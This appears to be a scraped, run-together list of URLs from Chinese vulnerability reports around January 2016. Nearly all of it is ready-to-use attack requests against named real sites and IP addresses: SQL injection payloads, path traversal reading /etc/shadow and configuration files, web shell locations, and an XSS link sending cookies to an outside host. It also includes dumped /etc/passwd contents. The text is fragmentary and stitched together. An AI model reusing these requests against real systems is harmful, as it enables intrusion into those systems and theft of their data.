http://ask.sdo.com/handlerv2/getarticles?gameno=89&OperationIP=192.168.137.82&OperationLocalTime=2016-01-11%2015:32:11&OperationSystem=android&OperationVersion=6.0.0&orderby=0&orderbytype=0&pageIndex=0&pagesize=%5c&status=-999&UserId=32439845&version=a.6.0.0 http://mailserver.juneyao.com/ http://180.169.55.154:8887/login.aspx http://219.143.213.189/ http://appfinder.locojoy.com/AJAX/GetServerByArea.ashx?area=55&os=mac&t=1453011370340&_=1453011370340 index.php/Home/Index/ http://work.locojoy.com http://**.**.**.**/upload/201601/20173918c7c68e074b1626afbd3e9806b33c9e7b.png https://**.**.**.**/search?query=glassfish++port%3A4848+country%3Ahk+4.1 http://111.13.112.18:8080/ http://111.13.112.18:8080 http://219.143.162.220:8080/ECHT/alipay/index.jsp http://219.143.162.220:7001/uddiexplorer/she11.jsp http://www.chashangzg.com/Index-login.html http://**.**.**.**:8090/dispatch.action http://**.**.**.**:8091/dispatch.action http://**.**.**.**:8090/cmd.jsp http://**.**.**.**:8889/gnete-web/report!show.action http://**.**.**.**:8889/gnete-web/cmd.jsp http://e-learning.qzccbank.com http://e-learning.qzccbank.com/lds/http/content/imageCutTemp/F20160117-192921451.jspx http://**.**.**.**/newtyhp/mobile/news_detail.php?id=95990%27 http://**.**.**.**/newtyhp/mobile/news_detail.php?id=95990 http://**.**.**.**/newtyhp/mobile/news_detail.php?id=95990 http://**.**.**.**/newtyhp/mobile/news_detail.php?id=95990 http://**.**.**.**/newtyhp/mobile/news_detail.php?id=95990 http://**.**.**.**/newtyhp/mobile/news_detail.php?id=95990 http://**.**.**.**/newtyhp/mobile/news_detail.php?id=-95990%20/*!union*/%20/*!select*/%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 http://q.letv.com/publish/ http://rtx.njzq.cn:8012/ http://rtx.njzq.cn:8012/webadmin.php http://rtx.njzq.cn:8012/userlist.php http://rtx.njzq.cn:8012/check.php http://www.flyinsky.net/index1.action http://www.flyinsky.net/1.txt http://www.flyinsky.net/bak.jsp 
http://www.mmall.com www.acunetix-referrer.com www.acunetix-referrer.com/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29&eurl=http%3A//www.mmall.com/zhuangxiu/journal.html&etime=1453033501&ctime=1453033419<ime=1453033328&compid=1727 www.mmall.com/goods-3983.html*http%3A//www.mmall.com/activity/201601pandian.html&__AD_DT-1*1453028615*http%3A//www.mmall.com/goods-35629.html*http%3A//www.mmall.com/activity/201601pandian.html&__AD_DT-1*1453028851*http%3A//www.mmall.com/goods-48678.html*http%3A//www.mmall.com/activity/201601pandian.html&__AD_DT-1*1453032970*http%3A//www.mmall.com/zhuangxiu/tu/list-1122.html*http%3A//www.mmall.com/activity/201601pandian.html&__AD_DT-1*1453033391*http%3A//www.mmall.com/zhuangxiu/tu/list-1074.html%3Fimg_id%3D18206*http%3A//www.mmall.com/activity/201601pandian.html clipboard:email:bsharesync www.mmall.com http://**.**.**.**/ http://**.**.**.**/intro_detail.php?id=4551 http://susun.l247.bizcn.com/www/susun/brokers_ok.php?id=563 http://180.97.104.104/index com:8080 com:8080 http://202.117.85.138/web/content.asp?id=803 http://202.117.85.138/news/admin.asp http://oa.hnu.cn/ http://139.129.12.107:8080/xb/index.html http://139.129.12.107:50080/ http://139.129.12.107:50080/hqfy.php?optionid=76 http://sc3.changan-mazda.com.cn:8888 http://jnjp.sinopharm.com/jnjp/home.action?m=toIndex www.c.qidian.com/qidian.rar http://218.16.100.212:8080/gionee/weibo/weixinuserManager!list?p=1&ps=10&nickname=&startTime=&endTime=&subscribe= http://221.123.177.64/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news 
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin mysql:x:500:500::/home/mysql:/sbin/nologin http://wooyun.org/bugs/wooyun-2015-0131342 http://**.**.**.**/portal_e2.php?button_num=e2 http://xueyuan.weibo.com/course/index?categoryid=&orderby_fild=3&orderby_operate=desc&key_word=¤t_type=0 http://**.**.**/pageinfo.phpcategoryid=24§ionid=6&articleid=24 http://218.26.176.181:8082/yyoa/ http://218.26.176.181:8082/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 http://tzds.zhcw.com/home/plug.php?do=service&act=check http://bbs.shanggame.com https://172.31.*.100 http://supports.jiaju.sina.com.cn/manage http://211.150.74.101/ http://211.150.74.101/WEB-INF/classes/log4j.properties http://211.150.74.101/WEB-INF/web.xml http://211.150.74.101/WEB-INF/classes/applicationContext.xml http://211.150.74.101/WEB-INF/classes//conf/spring/loginSpring.xml http://211.150.74.101/WEB-INF/classes//com/xmail/wm/login/action/LoginAction.class 
http://60.28.104.133:9060/yyoa/ http://60.28.104.133:9060/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=0&per_id=0 http://**.**.**.**/cf_list.php?id=2 http://**.**.**.**/cf_list.php?id=2 http://www.byd.cn/c:/ http://bbs.browser.qq.com/ajax/genPic?sIconUrl=http://ipaddress/log.png&sUrl=http://127.0.0.1 http://bbs.mb.qq.com/ajax/genPic?sIconUrl=http://ipaddress/log.png&sUrl=http://127.0.0.1 http://**.**.**.**/blog/View.asp?cid=857 http://182.106.215.110:8003/ http://182.106.215.110:8003/Image/f.jsp http://182.106.215.110:8003/Image/index.jsp http://**.**.**.**/ http://oa.sy-yy.com:8989/yyoa/ http://house.baidu.com/guilin/map/searchrect/?city=guilin&minx=999&maxx=999&miny=999&maxy=999&psz=999&dt=1&callback=bdmap.searchcallback http://astro.tsinghua.edu.cn/admin.php http://www.tmsk.cn/img/logo.png/.php http://www.tmsk.cn/bbs/forum.php http://www.tmsk.cn/bbs/uc_server/data/tmp/upload42796.png/.php http://**.**.**.**/console/main.shtml http://dmp.kingdee.com/jenkins/script http://student.sdu.edu.cn/login http://game.gamebean.com/pdmodel_list.php?model=1&s=31&channel=A307 http://bbs.sudu.cn/ www.scrcoa.com/yyoa/ www.scrcoa.com/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=0&per_id=0 http://**.**.**.**/v_show/id_XMTQ0OTIwMDY0NA==.html http://220.181.112.47/monife/templates/visualize4.php?nodeid=null http://admin.apps.v1.cn http://**.**.**.**:80/extpmsPdtInfo.do http://admin.iask.sina.com.cn/.svn/entries信息泄漏漏洞(目前已修补) http://202.108.103.161:9999/htcsp/ http://202.108.103.161:9999/htcsp/ShakeHandsAction.do?cmd=getMac http://202.108.103.161:9999/htcsp/ https://updates.venustech.com.cn/ http://**.**.**.**/soc_singleStuInfo.php?id=271 http://git.oschina.net/ jdbc:oracle:thin:@192.168.1.207:1521:orcl http://192.168.10.188:10101/mfbms-app-web/webservice/ChannelService http://192.168.7.249:8080/mfbms-app-web/webservice/ChannelService http://192.168.10.188:8891/mfbms-app-web/webservice/ChannelService 
http://192.168.10.188:10101/mfbms-app-web/webservice/ChannelService http://58.250.66.188:8974/mfbms-app-web/webservice/ChannelService http://192.168.10.188:10101/mfbms-app-web/webservice/ChannelService http://58.250.66.188:8974/mfbms-app-web/webservice/ChannelService http://192.168.3.241:8080/mfbms-app-web/webservice/ChannelService jdbc:oracle:thin:@192.168.10.217:1521:jrldDB http://www.zhaopiao.net/ http://id.gionee.com/members/start#/ http://id.gionee.com/.git/ http://www.chinanetwork.com.cn http://114.251.127.194:8000/Web_sc/login.gn http://zixun.baihe.com http://**.**.**.**/ http://i.leju.com/index.php这个链接来重置账号 http://udc.leju.com/Settings/Index/index依旧是四位的 http://**.**.**.**/ext/xxx.crx http://**.**.**.**/xxx/xx.zip http://www.ztesun.com/product.asp?keyword=-1 http://brand.wandahotels.com/ http://brand.wandahotels.com/%E6%8E%92%E9%99%A4%E7%9B%AE%E5%BD%95.txt http://brand.wandahotels.com/sql/.svn/entries http://brand.wandahotels.com/sql/wandahotel_20151118.sql http://brand.wandahotels.com/sql/wandahotel_20151121.sql http://60.10.8.130/存在同样的问题 http://lib.wap.zol.com.cn/ipj/rss/subscribe/?v=1.0&imei=A0000038518D0C http://lib.wap.zol.com.cn/ipj/readCalender/uploadRecord/ http://homesecurity.haier.com/HaierAF/login4webapp/downLoadFile.action?filePath=/doc/../../../../../../../etc/shadow http://homesecurity.haier.com/HaierAF/login4webapp/downLoadFile.action?filePath=/doc/api.pdf http://homesecurity.haier.com/HaierAF/login4webapp/downLoadFile.action?filePath=/doc/../WEB-INF/classes/config-database.properties http://s.p.qq.com/pub/jump?d=AAAar0by&TveiEdOavlhXhmMFEvihDEPyOJWbZU_wv=1027 http://coehm.pw/,页面伪造QQ空间登录页面,可钓鱼。并且已被攻击者利用,恶意信息活跃于各大社交平台。 http://www.hp1997.com/ http://www.flold.ecnu.edu.cn/manage/index.asp http://www.flold.ecnu.edu.cn/manage/login/login.asp http://218.75.77.62/modifyAddress.action?customerAddressDTO.seq=1&customerAddressDTO.customerId=15730 http://218.75.77.62/modifyAddress.action?customerAddressDTO.seq=1&customerAddressDTO.customerId=15718 
http://218.75.77.62/modifyAddress.action?customerAddressDTO.seq=1&customerAddressDTO.customerId=15655 http://218.75.77.62/modifyAddress.action?customerAddressDTO.seq=1&customerAddressDTO.customerId=15633 http://gmccpdm.midea.com.cn:8889/ cn:8889 http://oa.gykgnmg.com/yyoa/index.jsp http://218.5.65.215:8080/yyoa/ http://202.108.145.35:8888/is/index.jspx http://dhapi.dahebao.cn/search/search?userId=jsh569cfc523181e903527857&type=1&keywords=人&size=10&page=0&v=4.0&ty=a&appid=1234567890&dt=&tn=569cfc5ccd3ec247504638 http://dhapi.dahebao.cn/search/search?userId=jsh569cfc523181e903527857&type=1&keywords=人% http://www.wlxnsyzx.sdnu.edu.cn/ http://www.wlxnsyzx.sdnu.edu.cn/admin/login.asp http://**.**.**.**:7001/存在“Java http://mitv.tcl.com/DRP/,TCL员工直销平台订单管理系统。 URL:http://dckf.digitalchina.com http://dckf.digitalchina.com/index.php/qa/qainput?isetup=1&id=374 http://**.**.**.**/default/ http://**.**.**.** http://220.181.163.252/ http://220.181.163.252/nohup.out发现好像被人插入后门(见最后两张图,还请自查) http://**.**.**.**:7001存在JAVA反序列漏洞 http://**.**.**.**/cx/cx/Login.asp http://oa.shfft.com/ http://oa.shfft.com/ftp/im/160115162247328_69393137.jsp http://news.stuclub.cn/sanzi.php,id参数下没有过滤敏感字符如http://news.stuclub.cn/sanzi_show.php?id=346 http://cs.kuaidi100.gionee.com/login http://photo.made-in-china.com/ http://photo.made-in-china.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow http://photo.made-in-china.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://photo.made-in-china.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/opt/xyz//server_4.0/etc/apache2/httpd.conf http://photo.made-in-china.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/mic_en_file_upload.sh http://photo.made-in-china.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts http://4s.mysirui.com/ http://cauef1.cau.edu.cn/read_article.jsp?col=23&id=1264 http://cauef1.cau.edu.cn/read_article.jsp?col=23&id=1264 
https://**.**.**.**/gateway/1.jspx http://test2.m.letv.com:443/.svn/entries http://dckf.digitalchina.com/uploads/100/tunnel.php URL:http://10.1.122.240:806/ http://**.**.**.**/temple/intro_t_history.php?t_id=20 http://img.zhaopiao.net.cn/app/down/appdownload.html http://union.baidu.com/client/cooperation/cpro/filter/cproUrlFilterMgr!save.action http://**.**.**.**/eboss/login.jsp http://**.**.**.**/ http://202.120.44.237/manager/html http://202.120.44.237 http://**.**.**.**:7567/phpmyadmin/index.php http://**.**.**.**:7567/phpmyadmin/index.php http://**.**.**.**:7567/phpmyadmin/index.php http://**.**.**.**:7567/phpinfo.php http://cazx.changan.com.cn/live800/downlog.jsp?path=/&fileName=/etc/passwd http://hr.cnht.com.cn:11000/ehr/login.jspa)存在java反序列化漏洞导致getshell(之前白帽子提交的弱口令漏洞依然没修复,但是已经公开了)。 http://bang.weibo.com/meiti/shengfen?date=20150901 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://etcrm.net263.com/ m.koolearn.com/sheying/index/detailed/id/680 http://www.secwk.com/article/app/detail/810119111430919514 index.php/Web/Customer/getShopLine http://elutongxing.com/ elutongxing.com/linelist.html http://diaocha.360che.com/thread-397430-58-1.html http://diaocha.360che.com/viewthread.php?tid=397430&page=58 http://**.**.**.**/temple/intro_t_photob.php?tp_id=138&p=4 http://www.changan-mazda.com.cn/activity/index?year=2015&page=1 http://www.cetools.cn/index.php/cetools_admin/login http://qiantu.xdf.cn/wcm http://m.made-in-china.com/ http://m.made-in-china.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/sysconfig/network-scripts/ifcfg-eth0 http://m.made-in-china.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts http://m.made-in-china.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow http://m.made-in-china.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://218.62.24.136/checklogin.asp index.php/search-result.html 
http://www.laiyifen.com http://**.**.**.**/isc/block/view/sn/456* http://study.kingsunsoft.com/fzsyncadmin/VersionManage/AddVersionManage.aspx?ID=0 http://v.qq.com/bar/10276/post/6084799421411834686/comment/h5?%20lrr=http://webxss.cn/kX8S8e?1453214742 index.php/openapi/pam_callback/login/module/pam_passport_basic/type/member/appid/b2c/redirect/L2luZGV4LnBocC9wYXNzcG9ydC1wb3N0X2xvZ2luLWFIUjBjRG92TDNSMVlXNW5iM1V1YkdGcGVXbG1aVzR1WTI5dEx3PT0uaHRtbA%3D%3D http://tuangou.laiyifen.com http://cc-b233.bokecc.com:8042/node/node http://119.254.81.185:8088/cluster/apps http://ms.wanglibao.com/.svn/entries http://c2.dongfeng-citroen.com.cn/.svn/entries http://dealer.dongfeng-citroen.com.cn/.svn/entries http://elysee.dongfeng-citroen.com.cn/elysee.tar.gz http://spring.dongfeng-citroen.com.cn/ http://e.xbwl.cn/ www.acunetix-referrer.com/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29 e.xbwl.cn/website/aboutXB/11.jsp%3FpageType%3D00%26subType%3D0%26fw%3D320 http://220.178.6.140:8080/defaultroot/login.jsp http://220.178.6.140:8080/console/login/LoginForm.jsp shell1:http://220.178.6.140:8080/ca/ shell2:http://220.178.6.140:8080/defaultroot/upload/gov/one.jsp http://www.zdpxmidea.com/index.php?m=Con&a=logout http://gamedb.766.com/hon/hero/search.html www.hualife.cc http://v6.bang.weibo.com/aj/wemedia/rank?ajwvr=6&__rnd=1453197393175 com:8989/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=0&per_id=0 http://118.144.76.14 http://118.144.76.14/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../ ip:218.108.5.6 http://www.apnic.net/db/dbcopyright.html bt:/var/www# http://120.26.14.66/.svn/entries http://sdk.g.baofeng.com/.git/config http://weixinkaifa.7433.com/test.php http://datacenter.ak.cc/php.php http://jxcg.scu.edu.cn/Backet/login/index https://link.zhihu.com/?target=http://www.baidu.com https://link.zhihu.com/?target=http://ricter.me:8000%3F"%2Bdocument.cookie// http://**.**.**.**/townrcbnews.php?id=71 
http://st.hujiang.com/topic/167082907031/,是一个社团什么的。过滤了很多,但是 http://test.msdays.com/xss.swf https://**.**.**.**/welcome.php http://taihu.17500.cn/api/index/find/fid/13275 http://www.zte.com.cn/mobile/uaprof/N988.xml http://taihu.17500.cn/api/index/find/fid/13275 http://mail.huatu.com https://github.com/Manchester117/HighPin_VIK/blob/1ab3a97f27cea807a7497bad213f2fa73486bfd4/configure.conf http://nc.cofco.com/ http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd http://hr.minshengec.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml http://piao.962168.com/user/tokenAction!toTokenInfoModPage.action?id=111812 http://**.**.**.**/)存在SQL注入。 http://**.**.**.**/NewsWebUI/NewSearchMapFrame.aspx?organid=1&searchText=1(organid参数)。 http://nc.womaiapp.com nc.womaiapp.com/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml http://**.**.**.**/uapws/ http://sem.baidu.com/site/index http://cc.263.net/toReSetUserPwd http://www.newchinalife.com/live800/downlog.jsp?path=/&fileName=/etc/passwd http://oa.sino-tcm.com/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=0&per_id=0 http://**.**.**.**/weixinapp/bdsfz.asp https://github.com/a1357479/techan/blob/5792d078790f56dc1b852ba23e863ecfe851cf34/Application/Common/Conf/config.php https://www.idwzx.com/api/v2/loans/getCrowdFundLoanWithPage?pageSize=10&status=SCHEDULED&loanType=CROWDFUND¤tPage=2&orderBy=timeOpen https://www.idwzx.com/api/v2/loans/getCrowdFundLoanWithPage?pageSize=10&status=SCHEDULED&loanType=CROWDFUND¤tPage=1&orderBy=timeOpen https://www.idwzx.com/api/v2/loans/getLoanWithPage http://**.**.**.** http://**.**.**.** http://ocs.xiamenair.com.cn/live800/downlog.jsp?path=/&fileName=/etc/passwd http://**.**.**.**//swcxinfodata/addfile/kmgs/yxddly/addfile/160120/01453283824688295.jsp 1.asp/xx解析成asp脚本 https://effevo.com/ https://effevo.com/app/admin/#/login http://**.**.**.**/service/fee/zxkf.shtml 
http://zhuanzhuan.58.com/zz/transfer/getRecommendInfoForWZ http://3g.letao.com/wap/app_download.aspx?op=brand&bid=14 http://wzgyl.chinagasholdings.com/ http://huan.letao.com/wap/app_download.aspx?op=brand&bid=10 http://eboss.gjzq.cn/eboss/login.jsp http://www.chinamacro.cn/console/ http://scm.chinamacro.cn:8001/ http://scm.chinamacro.cn/console/ http://218.13.34.122:8082/ http://www.chinamacro.cn/h/f.jsp http://218.13.34.122:8082/f.jsp http://scm.chinamacro.cn/f.jsp http://science.ijournals.cn/jsunature_cn/ch/common_item.aspx?is_three_menu=0&line_num=16&parent_id=20061209112853001&menu_id=20061209122600001 www.letao.com http://www.letao.com/wap/pay/address.aspx?uuid1453276304&add=&addressid=&aid=110304&c=&cid=110304&form=0&op=newadd&pid=110000&tid=0 http://www.letao.com/wap/pay/address.aspx?uuid1453276304&add=&addressid=&aid=110304&c=&cid=GPJsD2Gh%27;%20waitfor%20delay%20%270:0:2%27%20--%20&form=0&op=newadd&pid=110000&tid=0 http://web.letao.com/wap/pay/address.aspx?uuid1453276304&add=&addressid=&aid=110304&c=&cid=110304&form=0&op=newadd&pid=110000&tid=0 http://mobile.letao.com/wap/pay/address.aspx?uuid1453276304&add=&addressid=&aid=110304&c=&cid=110304&form=0&op=newadd&pid=110000&tid=0 http://wspxreg.91huayi.com http://hr1.wahaha.com.cn/ http://bookshop.sjtup.com/ http://bookshop.sjtup.com/buycoursebook/detail?orderNo=2016012000050 http://www.mrhi.cn www.saywash.com http://cloud.im-cc.com/后台的管理密码,用的也是腾讯云的东西 http://piao.962168.com http://connect.qq.com/widget/shareqq/index.html?url=http://www.qzonerer.com/atiklc/test.php&desc=&title=&summary=&pics=http://www.qzonerer.com/atiklc/test.php&flash=&site=&style=201&width=32&height=32 http://siyue.jinku.com/index.php/Index/slist?aid=3703 http://notice.boyaa.com/.svn/entries https://mail.boyaa.com https://sslvpn.boyaa.com http://basic.oa.com/user/myInfo/495 http://basic.oa.com/user/myInfo/1 www.oa.com http://iddz.oa.com/lywiki/index.php?edition-compare-1 http://rmp.haier.net/ 
http://rmp.haier.net/kindeditor/php/file_manager_json.php?path=/ http://rmp.haier.net/kindeditor/php/file_manager_json.php?path=/opt/lampp/htdocs/ hr1.wahaha.com.cn/kb http://www.ultrapower.com.cn/webportal/.svn/entries http://**.**.**.**/bugs/wooyun-2015-0126617 http://**.**.**.**//perResumeView.action?id=501202 http://203.195.239.253:8090/login.do http://203.195.239.253:8090/1.jsp http://www.zouquwan.com/common/Server_Default.aspx?ColId=2 http://erp.suning.com.cn http://erp.suning.com.cn/uapws/service http://erp.suning.com.cn/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl erp.suning.com.cn/uapws/ http://58.215.43.17:7001 http://58.215.43.17:7001/payment/cssroot.jsp http://wooyun.org/bugs/wooyun-2013-040516 https://180.166.152.80/index.html http://www.kysec.cn/qk/tools/Main.aspx页面时 http://www.kysec.cn/qk/tools/main.aspx?path=/../ http://heuet.ss.cqvip.com/user/blog_search.aspx?keywords=u&subid=237 http://travel.sina.com.cn/fj_sanming_685-xiangqing-gonglue/ http://u.travel.sina.com.cn/api-i/qa/sendweibo?content=asdf1&callback=jQuery17206884582478087395_1452354554166&_=1452354673975 http://travel.sina.com.cn.zhchbin.xyz/ http://travel.sina.com.cn/aolanduo_2998-xiangqing-gonglue/ http://data.travel.sina.com.cn/award/friendships.php?uid=1684037597×=1453205469390&callback=jQuery172005376373999752104_1453205445886&_=1453205469391 http://36.48.189.176/doc/page/login.asp http://218.28.132.194/建业集团 http://61.163.95.187/建业控股 http://218.28.3.86/建业物业 http://218.29.103.146/建业泰宏 http://61.163.86.141:8080/建业集团 http://218.28.132.194/web-console http://218.28.132.194/jbossass/jbossass.jsp http://61.163.95.187/web-console http://61.163.95.187/jbossass/jbossass.jsp http://218.28.3.86/web-console http://218.28.3.86/jbossass/jbossass.jsp http://218.29.103.146/web-console/ http://218.29.103.146/jbossass/jbossass.jsp http://61.163.86.141:8080/web-console/ http://61.163.86.141:8080/jbossass/jbossass.jsp http://dtsmt.gw.com.cn/ 
https://iexam.h3c.com/customize/nwc_user_enterprise/login/login.html kali:/usr/share/sqlmap/output# https://iexam.h3c.com/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123* http://sqlmap.org index.php/Service/renzheng http://www.pldsec.com/ www.pldsec.com http://202.100.22.12/ http://202.100.22.12/uddiexplorer/css.jsp http://www.trjcn.com/ www.trjcn.com http://jpk.sicau.edu.cn/2007/4zwslx/newsinfo.asp?id=79 http://**.**.**.**/wooyun/index.jsp http://**.**.**/portal/setPwdphone=13888888888&yhms=administrator_ http://m.trjcn.com/manage/user_cert/email.html http://m.trjcn.com http://m.trjcn.com/manage/user_cert/email.html http://**.**.** http://**.**.**/apply/websiteDetailInfowebSiteId=23333&flag=1_ http://mail.cntv.cn/ http://122.227.246.125/cw/skin1/jsp/download.jsp?file=/WEB-INF/web.xml http://edu.newcapec.com.cn/Home/Index/news/id/49* http://www.newcapec.cn/index001.html http://office.newcapec.net:3216/ http://office.newcapec.net:5200/ims/default.aspx http://office.newcapec.net:3456/js/ewebeditor/ http://office.newcapec.net:3456/js/ewebeditor/admin/login.php http://madata.hc360.com/mobileweb/m/get/Ad?type=1&kind=1&mainind=030 service.zhaopin.com/live800/loginAction.jsp?companyLoginName=1&loginName=a111&password=111 http://101.227.240.110:8989 http://user.mapi.jiashuangkuaizi.com/Activity/GetByPageKey awift00:00:00:00:00:00&_osversion=4.4.2&_platform=Android&_screen=720x1280&_time=2016-01-21 http://user.mapi.jiashuangkuaizi.com/Activity/GetByPageKey awift00:00:00:00:00:00&_osversion=4.4.2&_platform=Android&_screen=720x1280&_time=2016-01-21 http://live800.wan.renren.com/live800/loginAction.jsp?companyLoginName=1*&loginName=a111&password=111 http://cloud.jixiangkeji.com/data/可以目录遍历,http://cloud.jixiangkeji.com/data/upload/user/idcard/ http://cloud.jixiangkeji.com/data http://oa.gkzj.com/yyoa/ http://222.189.156.67:8089/yyoa/ http://office.newcapec.net:5200/ims/prompt.aspx?msg=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E&type=type 
http://office.newcapec.net:5200/ims.rar http://58.59.14.99/vpmweb/login.jsp http://58.59.14.99/invoker/JMXInvokerServlet(admin、admin) http://211.160.21.126:7002/EICS/jsp/login.jsp www.google.com/images/logo.png http://mail.qq.com/xxx/?sid=sid&xxxxxx www.google.com www.google.com http://oa.cofco-keystone.com:8083 http://www.ccib.com.cn/CHN/Home/HomeShow.asp?ContentID=4076 http://219.143.162.216:7002/ht_server http://econ.shufe.edu.cn/login.php http://www.12321.cn http://apps.lib.whu.edu.cn/newbook/show.asp?a=631622 http://apps.lib.whu.edu.cn/skdh/xx/expert.asp?f_type=1 http://apps.lib.whu.edu.cn/skdh/gj/t_elib.asp?a=2 http://apps.lib.whu.edu.cn/jcxt/smkx.asp http://202.194.7.171:8080/sdw/ https://**.**.**.** http://**.**.**.** https://**.**.**.** http://**.**.**.**/index.php?do=show&page=3-3&id=2 http://eoa.septwolves.net:8084/carddata.aspx?uid=chenxiaom http://218.107.193.6:8200/login.aspx http://**.**.**.**/ally/list_in.php?ID=181&res_number=U2013061822564 http://182.151.206.253/ http://**.**.**.**/?view=member_center%2Fpatient_editor&patientId=111 http://**.**.**.**/?view=member_center%2Fpatient_editor&patientId=4081407 http://office.newcapec.net:2080/eCard/UKeyCode.aspx https://e-trade.ftsfund.com http://edison.wahaha.com.cn http://admin.apps.v1.cn/ http://**.**.**.**/getjob.ashx https://mail.njzq.com.cn/owa/ http://dealer.youxinpai.com/ http://tgb.changyou-inc.com/newspread/acegilogin.jsp http://**.**.**.**/myapp/detail.htm?apkName=org.ajmd http://**.**.**.**/apps/org.ajmd http://**.**.**.**/get_zhuanti_html.php?zid=95 http://203.74.57.13/etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin 
operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin uuidd:x:101:104:UUID daemon:/var/lib/libuuid:/sbin/nologin cyrus:x:76:12:Cyrus Server:/var/lib/imap:/bin/bash 